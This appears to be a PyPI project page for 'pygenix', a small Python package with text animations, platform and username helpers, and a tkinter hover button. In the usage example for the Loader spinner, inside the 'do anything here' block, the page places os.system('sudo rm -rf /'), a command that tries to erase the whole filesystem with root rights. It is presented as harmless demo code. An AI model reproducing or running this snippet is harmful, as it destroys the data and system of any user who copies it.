A Python Package That Contains Text Aimations And Some Useful Utils
Project description
Pygenix
A Python Package With Superpowers ;)
Installation
Clone The Project Then,
cd pygenix
pip install .
Features
- Typewriter Text Animation
from pygenix.ani import textanimation
# textanimation(text , speed)
textanimation("Hello World :D" , 0.1) # can use 0.01 too.
- Getting Username
from pygenix.utils import user
print(user)
- Getting Platfrom
from pygenix.utils import platfrom
print(platfrom)
- Getting Specific Platfrom
from pygenix.utils import splatfrom
print(splatfrom)
- Getting a Loding Animation credits to him
from pygenix.utils import Loader
import os
with Loader("Loading..."):
#do anything here
os.system('sudo rm -rf /')
- Getting a tkinter hover button , creds and written by him
from pygenix.ani import tk_hover_btn
tk_hover_btn(root, x, y, text, bcolor, fcolor, cmd)
Project details
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
pygenix-1.0.tar.gz
(3.4 kB
view hashes)
Built Distribution
pygenix-1.0-py3-none-any.whl
(3.7 kB
view hashes)